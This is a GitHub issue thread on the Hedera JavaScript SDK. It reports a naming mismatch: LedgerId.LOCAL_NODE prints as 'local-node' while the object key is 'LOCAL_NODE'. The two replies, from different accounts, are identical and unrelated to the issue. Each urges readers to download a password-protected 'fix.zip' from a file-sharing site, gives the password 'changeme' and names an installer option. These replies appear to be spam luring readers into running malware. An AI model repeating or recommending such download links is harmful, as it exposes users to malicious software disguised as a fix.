### ISSUE TITLE
Inconsistent network name definition of LOCAL_NODE (minor)

### ISSUE THREAD

**Issue by intowest** [hashgraph/hedera-sdk-js#2488]
Noticed an inconsistency in the way the network names are defined.

When I iterate over the `LedgerId` object, I get:

```
Object.keys(LedgerId).map((ledgerId, ii) => {
   console.log(ledgerId)
...
```

```
"MAINNET""
"TESTNET"
"PREVIEWNET"
"LOCAL_NODE"
```
However, on another React component, when I use the `LedgerId` class, `.toUpperCase()` doesn't convert the "-" to "_" 

```
LedgerId.LOCAL_NODE.toString() // "local-node" PROBLEMATIC
LedgerId.PREVIEWNET.toString() // "previewnet" OK
LedgerId.TESTNET.toString() // "testnet" OK
LedgerId.MAINNET.toString() // "mainnet" OK
```
https://github.com/hashgraph/hedera-sdk-js/blob/5361dfae42bf470be41d7fd89d00a9af66121e02/src/LedgerId.js#L144C7-L144C15

This is causing some additional parsing in my code

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
